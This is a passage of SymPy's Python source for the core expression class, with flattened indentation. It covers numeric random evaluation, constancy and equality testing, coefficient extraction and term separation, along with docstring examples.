The random complex value for each free symbol is generated
by the random_complex_number routine giving real and imaginary
parts in the range given by the re_min, re_max, im_min, and im_max
values. The returned value is evaluated to a precision of n
(if given) else the maximum of 15 and the precision needed
to get more than 1 digit of precision. If the expression
could not be evaluated to a number, or could not be evaluated
to more than 1 digit of precision, then None is returned.
Examples
========
>>> from sympy import sqrt
>>> from sympy.abc import x, y
>>> x._random() # doctest: +SKIP
0.0392918155679172 + 0.916050214307199*I
>>> x._random(2) # doctest: +SKIP
-0.77 - 0.87*I
>>> (x + y/2)._random(2) # doctest: +SKIP
-0.57 + 0.16*I
>>> sqrt(2)._random(2)
1.4
See Also
========
sympy.utilities.randtest.random_complex_number
"""
free = self.free_symbols
prec = 1
if free:
from sympy.utilities.randtest import random_complex_number
a, c, b, d = re_min, re_max, im_min, im_max
reps = dict(list(zip(free, [random_complex_number(a, b, c, d, rational=True)
for zi in free])))
try:
nmag = abs(self.evalf(2, subs=reps))
except (ValueError, TypeError):
# if an out of range value resulted in evalf problems
# then return None -- XXX is there a way to know how to
# select a good random number for a given expression?
# e.g. when calculating n! negative values for n should not
# be used
return None
else:
reps = {}
nmag = abs(self.evalf(2))
if not hasattr(nmag, '_prec'):
# e.g. exp_polar(2*I*pi) doesn't evaluate but is_number is True
return None
if nmag._prec == 1:
# increase the precision up to the default maximum
# precision to see if we can get any significance
from mpmath.libmp.libintmath import giant_steps
from sympy.core.evalf import DEFAULT_MAXPREC as target
# evaluate
for prec in giant_steps(2, target):
nmag = abs(self.evalf(prec, subs=reps))
if nmag._prec != 1:
break
if nmag._prec != 1:
if n is None:
n = max(prec, 15)
return self.evalf(n, subs=reps)
# never got any significance
return None
def is_constant(self, *wrt, **flags):
"""Return True if self is constant, False if not, or None if
the constancy could not be determined conclusively.
If an expression has no free symbols then it is a constant. If
there are free symbols it is possible that the expression is a
constant, perhaps (but not necessarily) zero. To test such
expressions, two strategies are tried:
1) numerical evaluation at two random points. If two such evaluations
give two different values and the values have a precision greater than
1 then self is not constant. If the evaluations agree or could not be
obtained with any precision, no decision is made. The numerical testing
        is done only if ``wrt`` is different from the free symbols.
2) differentiation with respect to variables in 'wrt' (or all free
symbols if omitted) to see if the expression is constant or not. This
will not always lead to an expression that is zero even though an
expression is constant (see added test in test_expr.py). If
all derivatives are zero then self is constant with respect to the
given symbols.
If neither evaluation nor differentiation can prove the expression is
constant, None is returned unless two numerical values happened to be
the same and the flag ``failing_number`` is True -- in that case the
numerical value will be returned.
If flag simplify=False is passed, self will not be simplified;
the default is True since self should be simplified before testing.
Examples
========
>>> from sympy import cos, sin, Sum, S, pi
>>> from sympy.abc import a, n, x, y
>>> x.is_constant()
False
>>> S(2).is_constant()
True
>>> Sum(x, (x, 1, 10)).is_constant()
True
>>> Sum(x, (x, 1, n)).is_constant()
False
>>> Sum(x, (x, 1, n)).is_constant(y)
True
>>> Sum(x, (x, 1, n)).is_constant(n)
False
>>> Sum(x, (x, 1, n)).is_constant(x)
True
>>> eq = a*cos(x)**2 + a*sin(x)**2 - a
>>> eq.is_constant()
True
>>> eq.subs({x: pi, a: 2}) == eq.subs({x: pi, a: 3}) == 0
True
>>> (0**x).is_constant()
False
>>> x.is_constant()
False
>>> (x**x).is_constant()
False
>>> one = cos(x)**2 + sin(x)**2
>>> one.is_constant()
True
>>> ((one - 1)**(x + 1)).is_constant() in (True, False) # could be 0 or 1
True
"""
simplify = flags.get('simplify', True)
# Except for expressions that contain units, only one of these should
# be necessary since if something is
# known to be a number it should also know that there are no
# free symbols. But is_number quits as soon as it hits a non-number
# whereas free_symbols goes until all free symbols have been collected,
# thus is_number should be faster. But a double check on free symbols
# is made just in case there is a discrepancy between the two.
free = self.free_symbols
if self.is_number or not free:
# if the following assertion fails then that object's free_symbols
# method needs attention: if an expression is a number it cannot
# have free symbols
assert not free
return True
# if we are only interested in some symbols and they are not in the
# free symbols then this expression is constant wrt those symbols
wrt = set(wrt)
if wrt and not wrt & free:
return True
wrt = wrt or free
# simplify unless this has already been done
expr = self
if simplify:
expr = expr.simplify()
# is_zero should be a quick assumptions check; it can be wrong for
# numbers (see test_is_not_constant test), giving False when it
# shouldn't, but hopefully it will never give True unless it is sure.
if expr.is_zero:
return True
# try numerical evaluation to see if we get two different values
failing_number = None
if wrt == free:
# try 0 (for a) and 1 (for b)
try:
a = expr.subs(list(zip(free, [0]*len(free))),
simultaneous=True)
if a is S.NaN:
# evaluation may succeed when substitution fails
a = expr._random(None, 0, 0, 0, 0)
except ZeroDivisionError:
a = None
if a is not None and a is not S.NaN:
try:
b = expr.subs(list(zip(free, [1]*len(free))),
simultaneous=True)
if b is S.NaN:
# evaluation may succeed when substitution fails
b = expr._random(None, 1, 0, 1, 0)
except ZeroDivisionError:
b = None
if b is not None and b is not S.NaN and b.equals(a) is False:
return False
# try random real
b = expr._random(None, -1, 0, 1, 0)
if b is not None and b is not S.NaN and b.equals(a) is False:
return False
# try random complex
b = expr._random()
if b is not None and b is not S.NaN:
if b.equals(a) is False:
return False
failing_number = a if a.is_number else b
# now we will test each wrt symbol (or all free symbols) to see if the
# expression depends on them or not using differentiation. This is
# not sufficient for all expressions, however, so we don't return
# False if we get a derivative other than 0 with free symbols.
for w in wrt:
deriv = expr.diff(w)
if simplify:
deriv = deriv.simplify()
if deriv != 0:
if not (pure_complex(deriv, or_real=True)):
if flags.get('failing_number', False):
return failing_number
elif deriv.free_symbols:
# dead line provided _random returns None in such cases
return None
return False
return True
def equals(self, other, failing_expression=False):
"""Return True if self == other, False if it doesn't, or None. If
failing_expression is True then the expression which did not simplify
to a 0 will be returned instead of None.
If ``self`` is a Number (or complex number) that is not zero, then
the result is False.
If ``self`` is a number and has not evaluated to zero, evalf will be
used to test whether the expression evaluates to zero. If it does so
and the result has significance (i.e. the precision is either -1, for
a Rational result, or is greater than 1) then the evalf value will be
used to return True or False.
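
        Examples
        ========

        A couple of illustrative cases:

        >>> from sympy import cos, sin, S
        >>> from sympy.abc import x
        >>> (cos(x)**2 + sin(x)**2).equals(S.One)
        True
        >>> S(2).equals(3)
        False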
"""
from sympy.simplify.simplify import nsimplify, simplify
from sympy.solvers.solvers import solve
from sympy.solvers.solveset import solveset
from sympy.polys.polyerrors import NotAlgebraic
from sympy.polys.numberfields import minimal_polynomial
other = sympify(other)
if self == other:
return True
# they aren't the same so see if we can make the difference 0;
# don't worry about doing simplification steps one at a time
# because if the expression ever goes to 0 then the subsequent
# simplification steps that are done will be very fast.
diff = factor_terms((self - other).simplify(), radical=True)
if not diff:
return True
if not diff.has(Add, Mod):
# if there is no expanding to be done after simplifying
# then this can't be a zero
return False
constant = diff.is_constant(simplify=False, failing_number=True)
if constant is False:
return False
if constant is None and (diff.free_symbols or not diff.is_number):
# e.g. unless the right simplification is done, a symbolic
# zero is possible (see expression of issue 6829: without
# simplification constant will be None).
return
if constant is True:
ndiff = diff._random()
if ndiff:
return False
# sometimes we can use a simplified result to give a clue as to
# what the expression should be; if the expression is *not* zero
# then we should have been able to compute that and so now
# we can just consider the cases where the approximation appears
# to be zero -- we try to prove it via minimal_polynomial.
if diff.is_number:
approx = diff.nsimplify()
if not approx:
# try to prove via self-consistency
surds = [s for s in diff.atoms(Pow) if s.args[0].is_Integer]
# it seems to work better to try big ones first
surds.sort(key=lambda x: -x.args[0])
for s in surds:
try:
# simplify is False here -- this expression has already
# been identified as being hard to identify as zero;
# we will handle the checking ourselves using nsimplify
# to see if we are in the right ballpark or not and if so
# *then* the simplification will be attempted.
if s.is_Symbol:
sol = list(solveset(diff, s))
else:
sol = [s]
if sol:
if s in sol:
return True
if s.is_real:
if any(nsimplify(si, [s]) == s and simplify(si) == s
for si in sol):
return True
except NotImplementedError:
pass
# try to prove with minimal_polynomial but know when
# *not* to use this or else it can take a long time. e.g. issue 8354
if True: # change True to condition that assures non-hang
try:
mp = minimal_polynomial(diff)
if mp.is_Symbol:
return True
return False
except (NotAlgebraic, NotImplementedError):
pass
# diff has not simplified to zero; constant is either None, True
# or the number with significance (prec != 1) that was randomly
# calculated twice as the same value.
if constant not in (True, None) and constant != 0:
return False
if failing_expression:
return diff
return None
def _eval_is_positive(self):
from sympy.polys.numberfields import minimal_polynomial
from sympy.polys.polyerrors import NotAlgebraic
if self.is_number:
if self.is_real is False:
return False
try:
# check to see that we can get a value
n2 = self._eval_evalf(2)
if n2 is None:
raise AttributeError
if n2._prec == 1: # no significance
raise AttributeError
if n2 == S.NaN:
raise AttributeError
except (AttributeError, ValueError):
return None
n, i = self.evalf(2).as_real_imag()
if not i.is_Number or not n.is_Number:
return False
if n._prec != 1 and i._prec != 1:
return bool(not i and n > 0)
elif n._prec == 1 and (not i or i._prec == 1) and \
self.is_algebraic and not self.has(Function):
try:
if minimal_polynomial(self).is_Symbol:
return False
except (NotAlgebraic, NotImplementedError):
pass
def _eval_is_negative(self):
from sympy.polys.numberfields import minimal_polynomial
from sympy.polys.polyerrors import NotAlgebraic
if self.is_number:
if self.is_real is False:
return False
try:
# check to see that we can get a value
n2 = self._eval_evalf(2)
if n2 is None:
raise AttributeError
if n2._prec == 1: # no significance
raise AttributeError
if n2 == S.NaN:
raise AttributeError
except (AttributeError, ValueError):
return None
n, i = self.evalf(2).as_real_imag()
if not i.is_Number or not n.is_Number:
return False
if n._prec != 1 and i._prec != 1:
return bool(not i and n < 0)
elif n._prec == 1 and (not i or i._prec == 1) and \
self.is_algebraic and not self.has(Function):
try:
if minimal_polynomial(self).is_Symbol:
return False
except (NotAlgebraic, NotImplementedError):
pass
def _eval_interval(self, x, a, b):
"""
Returns evaluation over an interval. For most functions this is:
self.subs(x, b) - self.subs(x, a),
possibly using limit() if NaN is returned from subs.
        If b or a is None, it only evaluates -self.subs(x, a) or self.subs(x, b),
respectively.
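
        Examples
        ========

        An illustrative case:

        >>> from sympy.abc import x
        >>> (x**2)._eval_interval(x, 1, 3)
        8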
"""
from sympy.series import limit, Limit
if (a is None and b is None):
raise ValueError('Both interval ends cannot be None.')
if a is None:
A = 0
else:
A = self.subs(x, a)
if A.has(S.NaN, S.Infinity, S.NegativeInfinity, S.ComplexInfinity):
A = limit(self, x, a)
if A is S.NaN:
return A
if isinstance(A, Limit):
raise NotImplementedError("Could not compute limit")
if b is None:
B = 0
else:
B = self.subs(x, b)
if B.has(S.NaN, S.Infinity, S.NegativeInfinity, S.ComplexInfinity):
B = limit(self, x, b)
if isinstance(B, Limit):
raise NotImplementedError("Could not compute limit")
return B - A
def _eval_power(self, other):
# subclass to compute self**other for cases when
# other is not NaN, 0, or 1
return None
def _eval_conjugate(self):
if self.is_real:
return self
elif self.is_imaginary:
return -self
def conjugate(self):
from sympy.functions.elementary.complexes import conjugate as c
return c(self)
def _eval_transpose(self):
from sympy.functions.elementary.complexes import conjugate
if self.is_complex:
return self
elif self.is_hermitian:
return conjugate(self)
elif self.is_antihermitian:
return -conjugate(self)
def transpose(self):
from sympy.functions.elementary.complexes import transpose
return transpose(self)
def _eval_adjoint(self):
from sympy.functions.elementary.complexes import conjugate, transpose
if self.is_hermitian:
return self
elif self.is_antihermitian:
return -self
obj = self._eval_conjugate()
if obj is not None:
return transpose(obj)
obj = self._eval_transpose()
if obj is not None:
return conjugate(obj)
def adjoint(self):
from sympy.functions.elementary.complexes import adjoint
return adjoint(self)
@classmethod
def _parse_order(cls, order):
"""Parse and configure the ordering of terms. """
from sympy.polys.orderings import monomial_key
try:
reverse = order.startswith('rev-')
except AttributeError:
reverse = False
else:
if reverse:
order = order[4:]
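                # e.g. 'rev-lex' leaves order == 'lex' with reverse=True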
monom_key = monomial_key(order)
def neg(monom):
result = []
for m in monom:
if isinstance(m, tuple):
result.append(neg(m))
else:
result.append(-m)
return tuple(result)
def key(term):
_, ((re, im), monom, ncpart) = term
monom = neg(monom_key(monom))
ncpart = tuple([e.sort_key(order=order) for e in ncpart])
coeff = ((bool(im), im), (re, im))
return monom, ncpart, coeff
return key, reverse
def as_ordered_factors(self, order=None):
"""Return list of ordered factors (if Mul) else [self]."""
return [self]
def as_ordered_terms(self, order=None, data=False):
"""
Transform an expression to an ordered list of terms.
Examples
========
>>> from sympy import sin, cos
>>> from sympy.abc import x
>>> (sin(x)**2*cos(x) + sin(x)**2 + 1).as_ordered_terms()
[sin(x)**2*cos(x), sin(x)**2, 1]
"""
key, reverse = self._parse_order(order)
terms, gens = self.as_terms()
if not any(term.is_Order for term, _ in terms):
ordered = sorted(terms, key=key, reverse=reverse)
else:
_terms, _order = [], []
for term, repr in terms:
if not term.is_Order:
_terms.append((term, repr))
else:
_order.append((term, repr))
ordered = sorted(_terms, key=key, reverse=True) \
+ sorted(_order, key=key, reverse=True)
if data:
return ordered, gens
else:
return [term for term, _ in ordered]
def as_terms(self):
"""Transform an expression to a list of terms. """
from .add import Add
from .mul import Mul
from .exprtools import decompose_power
gens, terms = set([]), []
for term in Add.make_args(self):
coeff, _term = term.as_coeff_Mul()
coeff = complex(coeff)
cpart, ncpart = {}, []
if _term is not S.One:
for factor in Mul.make_args(_term):
if factor.is_number:
try:
coeff *= complex(factor)
except TypeError:
pass
else:
continue
if factor.is_commutative:
base, exp = decompose_power(factor)
cpart[base] = exp
gens.add(base)
else:
ncpart.append(factor)
coeff = coeff.real, coeff.imag
ncpart = tuple(ncpart)
terms.append((term, (coeff, cpart, ncpart)))
gens = sorted(gens, key=default_sort_key)
k, indices = len(gens), {}
for i, g in enumerate(gens):
indices[g] = i
result = []
for term, (coeff, cpart, ncpart) in terms:
monom = [0]*k
for base, exp in cpart.items():
monom[indices[base]] = exp
result.append((term, (coeff, tuple(monom), ncpart)))
return result, gens
def removeO(self):
"""Removes the additive O(..) symbol if there is one"""
return self
def getO(self):
"""Returns the additive O(..) symbol if there is one, else None."""
return None
def getn(self):
"""
Returns the order of the expression.
        The order is determined from the O(...) term. If there
        is no O(...) term, None is returned.
Examples
========
>>> from sympy import O
>>> from sympy.abc import x
>>> (1 + x + O(x**2)).getn()
2
>>> (1 + x).getn()
"""
from sympy import Dummy, Symbol
o = self.getO()
if o is None:
return None
elif o.is_Order:
o = o.expr
if o is S.One:
return S.Zero
if o.is_Symbol:
return S.One
if o.is_Pow:
return o.args[1]
if o.is_Mul: # x**n*log(x)**n or x**n/log(x)**n
for oi in o.args:
if oi.is_Symbol:
return S.One
if oi.is_Pow:
syms = oi.atoms(Symbol)
if len(syms) == 1:
x = syms.pop()
oi = oi.subs(x, Dummy('x', positive=True))
if oi.base.is_Symbol and oi.exp.is_Rational:
return abs(oi.exp)
raise NotImplementedError('not sure of order of %s' % o)
def count_ops(self, visual=None):
"""wrapper for count_ops that returns the operation count."""
from .function import count_ops
return count_ops(self, visual)
def args_cnc(self, cset=False, warn=True, split_1=True):
"""Return [commutative factors, non-commutative factors] of self.
self is treated as a Mul and the ordering of the factors is maintained.
If ``cset`` is True the commutative factors will be returned in a set.
If there were repeated factors (as may happen with an unevaluated Mul)
        then an error will be raised unless it is explicitly suppressed by
setting ``warn`` to False.
Note: -1 is always separated from a Number unless split_1 is False.
>>> from sympy import symbols, oo
>>> A, B = symbols('A B', commutative=0)
>>> x, y = symbols('x y')
>>> (-2*x*y).args_cnc()
[[-1, 2, x, y], []]
>>> (-2.5*x).args_cnc()
[[-1, 2.5, x], []]
>>> (-2*x*A*B*y).args_cnc()
[[-1, 2, x, y], [A, B]]
>>> (-2*x*A*B*y).args_cnc(split_1=False)
[[-2, x, y], [A, B]]
>>> (-2*x*y).args_cnc(cset=True)
[set([-1, 2, x, y]), []]
The arg is always treated as a Mul:
>>> (-2 + x + A).args_cnc()
[[], [x - 2 + A]]
>>> (-oo).args_cnc() # -oo is a singleton
[[-1, oo], []]
"""
if self.is_Mul:
args = list(self.args)
else:
args = [self]
for i, mi in enumerate(args):
if not mi.is_commutative:
c = args[:i]
nc = args[i:]
break
else:
c = args
nc = []
if c and split_1 and (
c[0].is_Number and
c[0].is_negative and
c[0] is not S.NegativeOne):
c[:1] = [S.NegativeOne, -c[0]]
if cset:
clen = len(c)
c = set(c)
if clen and warn and len(c) != clen:
raise ValueError('repeated commutative arguments: %s' %
[ci for ci in c if list(self.args).count(ci) > 1])
return [c, nc]
def coeff(self, x, n=1, right=False):
"""
        Returns the coefficient from the term(s) containing ``x**n``; if there
        is no such term, zero is returned. If ``n`` is zero then all terms
        independent of ``x`` will be returned.
When x is noncommutative, the coeff to the left (default) or right of x
can be returned. The keyword 'right' is ignored when x is commutative.
See Also
========
as_coefficient: separate the expression into a coefficient and factor
as_coeff_Add: separate the additive constant from an expression
as_coeff_Mul: separate the multiplicative constant from an expression
as_independent: separate x-dependent terms/factors from others
sympy.polys.polytools.coeff_monomial: efficiently find the single coefficient of a monomial in Poly
sympy.polys.polytools.nth: like coeff_monomial but powers of monomial terms are used
Examples
========
>>> from sympy import symbols
>>> from sympy.abc import x, y, z
You can select terms that have an explicit negative in front of them:
>>> (-x + 2*y).coeff(-1)
x
>>> (x - 2*y).coeff(-1)
2*y
You can select terms with no Rational coefficient:
>>> (x + 2*y).coeff(1)
x
>>> (3 + 2*x + 4*x**2).coeff(1)
0
You can select terms independent of x by making n=0; in this case
expr.as_independent(x)[0] is returned (and 0 will be returned instead
of None):
>>> (3 + 2*x + 4*x**2).coeff(x, 0)
3
>>> eq = ((x + 1)**3).expand() + 1
>>> eq
x**3 + 3*x**2 + 3*x + 2
>>> [eq.coeff(x, i) for i in reversed(range(4))]
[1, 3, 3, 2]
>>> eq -= 2
>>> [eq.coeff(x, i) for i in reversed(range(4))]
[1, 3, 3, 0]
You can select terms that have a numerical term in front of them:
>>> (-x - 2*y).coeff(2)
-y
>>> from sympy import sqrt
>>> (x + sqrt(2)*x).coeff(sqrt(2))
x
The matching is exact:
>>> (3 + 2*x + 4*x**2).coeff(x)
2
>>> (3 + 2*x + 4*x**2).coeff(x**2)
4
>>> (3 + 2*x + 4*x**2).coeff(x**3)
0
>>> (z*(x + y)**2).coeff((x + y)**2)
z
>>> (z*(x + y)**2).coeff(x + y)
0
In addition, no factoring is done, so 1 + z*(1 + y) is not obtained
from the following:
>>> (x + z*(x + x*y)).coeff(x)
1
If such factoring is desired, factor_terms can be used first:
>>> from sympy import factor_terms
>>> factor_terms(x + z*(x + x*y)).coeff(x)
z*(y + 1) + 1
>>> n, m, o = symbols('n m o', commutative=False)
>>> n.coeff(n)
1
>>> (3*n).coeff(n)
3
>>> (n*m + m*n*m).coeff(n) # = (1 + m)*n*m
1 + m
>>> (n*m + m*n*m).coeff(n, right=True) # = (1 + m)*n*m
m
If there is more than one possible coefficient 0 is returned:
>>> (n*m + m*n).coeff(n)
0
If there is only one possible coefficient, it is returned:
>>> (n*m + x*m*n).coeff(m*n)
x
>>> (n*m + x*m*n).coeff(m*n, right=1)
1
"""
x = sympify(x)
if not isinstance(x, Basic):
return S.Zero
n = as_int(n)
if not x:
return S.Zero
if x == self:
if n == 1:
return S.One
return S.Zero
if x is S.One:
co = [a for a in Add.make_args(self)
if a.as_coeff_Mul()[0] is S.One]
if not co:
return S.Zero
return Add(*co)
if n == 0:
if x.is_Add and self.is_Add:
c = self.coeff(x, right=right)
if not c:
return S.Zero
if not right:
return self - Add(*[a*x for a in Add.make_args(c)])
return self - Add(*[x*a for a in Add.make_args(c)])
return self.as_independent(x, as_Add=True)[0]
# continue with the full method, looking for this power of x:
x = x**n
def incommon(l1, l2):
if not l1 or not l2:
return []
n = min(len(l1), len(l2))
for i in range(n):
if l1[i] != l2[i]:
return l1[:i]
return l1[:]
def find(l, sub, first=True):
""" Find where list sub appears in list l. When ``first`` is True
the first occurance from the left is returned, else the last
occurance is returned. Return None if sub is not in l.
>> l = range(5)*2
>> find(l, [2, 3])
2
>> find(l, [2, 3], first=0)
7
>> find(l, [2, 4])
None
"""
if not sub or not l or len(sub) > len(l):
return None
n = len(sub)
if not first:
l.reverse()
sub.reverse()
for i in range(0, len(l) - n + 1):
if all(l[i + j] == sub[j] for j in range(n)):
break
else:
i = None
if not first:
l.reverse()
sub.reverse()
if i is not None and not first:
i = len(l) - (i + n)
return i
co = []
args = Add.make_args(self)
self_c = self.is_commutative
x_c = x.is_commutative
if self_c and not x_c:
return S.Zero
if self_c:
xargs = x.args_cnc(cset=True, warn=False)[0]
for a in args:
margs = a.args_cnc(cset=True, warn=False)[0]
if len(xargs) > len(margs):
continue
resid = margs.difference(xargs)
if len(resid) + len(xargs) == len(margs):
co.append(Mul(*resid))
if co == []:
return S.Zero
elif co:
return Add(*co)
elif x_c:
xargs = x.args_cnc(cset=True, warn=False)[0]
for a in args:
margs, nc = a.args_cnc(cset=True)
if len(xargs) > len(margs):
continue
resid = margs.difference(xargs)
if len(resid) + len(xargs) == len(margs):
co.append(Mul(*(list(resid) + nc)))
if co == []:
return S.Zero
elif co:
return Add(*co)
else: # both nc
xargs, nx = x.args_cnc(cset=True)
            # find the terms whose commutative factors are compatible with x's
for a in args:
margs, nc = a.args_cnc(cset=True)
if len(xargs) > len(margs):
continue
resid = margs.difference(xargs)
if len(resid) + len(xargs) == len(margs):
co.append((resid, nc))
# now check the non-comm parts
if not co:
return S.Zero
if all(n == co[0][1] for r, n in co):
ii = find(co[0][1], nx, right)
if ii is not None:
if not right:
return Mul(Add(*[Mul(*r) for r, c in co]), Mul(*co[0][1][:ii]))
else:
return Mul(*co[0][1][ii + len(nx):])
beg = reduce(incommon, (n[1] for n in co))
if beg:
ii = find(beg, nx, right)
if ii is not None:
if not right:
gcdc = co[0][0]
for i in range(1, len(co)):
gcdc = gcdc.intersection(co[i][0])
if not gcdc:
break
return Mul(*(list(gcdc) + beg[:ii]))
else:
m = ii + len(nx)
return Add(*[Mul(*(list(r) + n[m:])) for r, n in co])
end = list(reversed(
reduce(incommon, (list(reversed(n[1])) for n in co))))
if end:
ii = find(end, nx, right)
if ii is not None:
if not right:
return Add(*[Mul(*(list(r) + n[:-len(end) + ii])) for r, n in co])
else:
return Mul(*end[ii + len(nx):])
# look for single match
hit = None
for i, (r, n) in enumerate(co):
ii = find(n, nx, right)
if ii is not None:
if not hit:
hit = ii, r, n
else:
break
else:
if hit:
ii, r, n = hit
if not right:
return Mul(*(list(r) + n[:ii]))
else:
return Mul(*n[ii + len(nx):])
return S.Zero
def as_expr(self, *gens):
"""
Convert a polynomial to a SymPy expression.
Examples
========
>>> from sympy import sin
>>> from sympy.abc import x, y
>>> f = (x**2 + x*y).as_poly(x, y)
>>> f.as_expr()
x**2 + x*y
>>> sin(x).as_expr()
sin(x)
"""
return self
def as_coefficient(self, expr):
"""
        Extracts symbolic coefficient at the given expression. In
        other words, this function separates 'self' into the product
        of 'expr' and an 'expr'-free coefficient. If such separation
is not possible it will return None.
Examples
========
>>> from sympy import E, pi, sin, I, Poly
>>> from sympy.abc import x
>>> E.as_coefficient(E)
1
>>> (2*E).as_coefficient(E)
2
>>> (2*sin(E)*E).as_coefficient(E)
        Two terms have E in them so a sum is returned. (If one desires
        the coefficient of the term exactly matching E then
the constant from the returned expression could be selected.
Or, for greater precision, a method of Poly can be used to
indicate the desired term from which the coefficient is
desired.)
>>> (2*E + x*E).as_coefficient(E)
x + 2
>>> _.args[0] # just want the exact match
2
>>> p = Poly(2*E + x*E); p
Poly(x*E + 2*E, x, E, domain='ZZ')
>>> p.coeff_monomial(E)
2
>>> p.nth(0, 1)
2
Since the following cannot be written as a product containing
E as a factor, None is returned. (If the coefficient ``2*x`` is
desired then the ``coeff`` method should be used.)
>>> (2*E*x + x).as_coefficient(E)
>>> (2*E*x + x).coeff(E)
2*x
>>> (E*(x + 1) + x).as_coefficient(E)
>>> (2*pi*I).as_coefficient(pi*I)
2
>>> (2*I).as_coefficient(pi*I)
See Also
========
        coeff: return sum of terms having a given factor
as_coeff_Add: separate the additive constant from an expression
as_coeff_Mul: separate the multiplicative constant from an expression
as_independent: separate x-dependent terms/factors from others
sympy.polys.polytools.coeff_monomial: efficiently find the single coefficient of a monomial in Poly
sympy.polys.polytools.nth: like coeff_monomial but powers of monomial terms are used
"""
r = self.extract_multiplicatively(expr)
if r and not r.has(expr):
return r
def as_independent(self, *deps, **hint):
"""
        A mostly naive separation of a Mul or Add into arguments that are or
        are not dependent on deps. To obtain as complete a separation of
        variables as possible, use a separation method first, e.g.:
* separatevars() to change Mul, Add and Pow (including exp) into Mul
* .expand(mul=True) to change Add or Mul into Add
* .expand(log=True) to change log expr into an Add
The only non-naive thing that is done here is to respect noncommutative
ordering of variables and to always return (0, 0) for `self` of zero
regardless of hints.
For nonzero `self`, the returned tuple (i, d) has the
following interpretation:
        * i will have no variable that appears in deps
* d will be 1 or else have terms that contain variables that are in deps
* if self is an Add then self = i + d
* if self is a Mul then self = i*d
* otherwise (self, S.One) or (S.One, self) is returned.
To force the expression to be treated as an Add, use the hint as_Add=True
Examples
========
-- self is an Add
>>> from sympy import sin, cos, exp
>>> from sympy.abc import x, y, z
>>> (x + x*y).as_independent(x)
(0, x*y + x)
>>> (x + x*y).as_independent(y)
(x, x*y)
>>> (2*x*sin(x) + y + x + z).as_independent(x)
(y + z, 2*x*sin(x) + x)
>>> (2*x*sin(x) + y + x + z).as_independent(x, y)
(z, 2*x*sin(x) + x + y)
-- self is a Mul
>>> (x*sin(x)*cos(y)).as_independent(x)
(cos(y), x*sin(x))
non-commutative terms cannot always be separated out when self is a Mul
>>> from sympy import symbols
>>> n1, n2, n3 = symbols('n1 n2 n3', commutative=False)
>>> (n1 + n1*n2).as_independent(n2)
(n1, n1*n2)
>>> (n2*n1 + n1*n2).as_independent(n2)
(0, n1*n2 + n2*n1)
>>> (n1*n2*n3).as_independent(n1)
(1, n1*n2*n3)
>>> (n1*n2*n3).as_independent(n2)
(n1, n2*n3)
>>> ((x-n1)*(x-y)).as_independent(x)
(1, (x - y)*(x - n1))
-- self is anything else:
>>> (sin(x)).as_independent(x)
(1, sin(x))
>>> (sin(x)).as_independent(y)
(sin(x), 1)
>>> exp(x+y).as_independent(x)
(1, exp(x + y))
-- force self to be treated as an Add:
>>> (3*x).as_independent(x, as_Add=True)
(0, 3*x)
-- force self to be treated as a Mul:
>>> (3+x).as_independent(x, as_Add=False)
(1, x + 3)
>>> (-3+x).as_independent(x, as_Add=False)
(1, x - 3)
Note how the below differs from the above in making the
constant on the dep term positive.
>>> (y*(-3+x)).as_independent(x)
(y, x - 3)
-- use .as_independent() for true independence testing instead
of .has(). The former considers only symbols in the free
symbols while the latter considers all symbols
>>> from sympy import Integral
>>> I = Integral(x, (x, 1, 2))
>>> I.has(x)
True
>>> x in I.free_symbols
False
>>> I.as_independent(x) == (I, 1)
True
>>> (I + x).as_independent(x) == (I, x)
True
Note: when trying to get independent terms, a separation method
might need to be used first. In this case, it is important to keep
track of what you send to this routine so you know how to interpret
the returned values
>>> from sympy import separatevars, log
>>> separatevars(exp(x+y)).as_independent(x)
(exp(y), exp(x))
>>> (x + x*y).as_independent(y)
(x, x*y)
>>> separatevars(x + x*y).as_independent(y)
(x, y + 1)
>>> (x*(1 + y)).as_independent(y)
(x, y + 1)
>>> (x*(1 + y)).expand(mul=True).as_independent(y)
(x, x*y)
>>> a, b=symbols('a b', positive=True)
>>> (log(a*b).expand(log=True)).as_independent(b)
(log(a), log(b))
See Also
========
.separatevars(), .expand(log=True), Add.as_two_terms(),
Mul.as_two_terms(), .as_coeff_add(), .as_coeff_mul()
"""
from .symbol import Symbol
from .add import _unevaluated_Add
from .mul import _unevaluated_Mul
from sympy.utilities.iterables import sift
if self.is_zero:
return S.Zero, S.Zero
func = self.func
if hint.get('as_Add', func is Add):
want = Add
else:
want = Mul
if func is not want and (func is Add or func is Mul):
return (want.identity, self)
# sift out deps into symbolic and other and ignore
# all symbols but those that are in the free symbols
sym = set()
other = []
for d in deps:
if isinstance(d, Symbol): # Symbol.is_Symbol is True
sym.add(d)
else:
other.append(d)
def has(e):
"""return the standard has() if there are no literal symbols, else
check to see that symbol-deps are in the free symbols."""
has_other = e.has(*other)
if not sym:
return has_other
return has_other or e.has(*(e.free_symbols & sym))
if (want is not func or
func is not Add and func is not Mul):
if has(self):
return (want.identity, self)
else:
return (self, want.identity)
else:
if func is Add:
args = list(self.args)
else:
args, nc = self.args_cnc()
d = sift(args, lambda x: has(x))
depend = d[True]
indep = d[False]
if func is Add: # all terms were treated as commutative
return (Add(*indep), _unevaluated_Add(*depend))
else: # handle noncommutative by stopping at first dependent term
for i, n in enumerate(nc):
if has(n):
depend.extend(nc[i:])
break
indep.append(n)
return Mul(*indep), (
Mul(*depend, evaluate=False) if nc else
_unevaluated_Mul(*depend))
def as_real_imag(self, deep=True, **hints):
"""Performs complex expansion on 'self' and returns a tuple
containing collected both real and imaginary parts. This
method can't be confused with re() and im() functions,
which does not perform complex expansion at evaluation.
However it is possible to expand both re() and im()
functions and get exactly the same results as with
a single call to this function.
>>> from sympy import symbols, I
>>> x, y = symbols('x,y', real=True)
>>> (x + y*I).as_real_imag()
(x, y)
>>> from sympy.abc import z, w
>>> (z + w*I).as_real_imag()
(re(z) - im(w), re(w) + im(z))
"""
from sympy import im, re
if hints.get('ignore') == self:
return None
else:
return (re(self), im(self))
def as_powers_dict(self):
"""Return self as a dictionary of factors with each factor being
treated as a power. The keys are the bases of the factors and the
values, the corresponding exponents. The resulting dictionary should
be used with caution if the expression is a Mul and contains non-
        commutative factors, since the order in which they appeared will be lost in
the dictionary."""
d = defaultdict(int)
d.update(dict([self.as_base_exp()]))
return d
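# Illustrative note (hypothetical session): Mul and Pow override this, so the
# factors of a product map to their exponents, e.g. (x**2*y).as_powers_dict()
# maps x -> 2 and y -> 1; the generic fallback above just wraps
# self.as_base_exp() in a one-entry dict.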
def as_coefficients_dict(self):
"""Return a dictionary mapping terms to their Rational coefficient.
Since the dictionary is a defaultdict, inquiries about terms which
were not present will return a coefficient of 0. If an expression is
not an Add it is considered to have a single term.
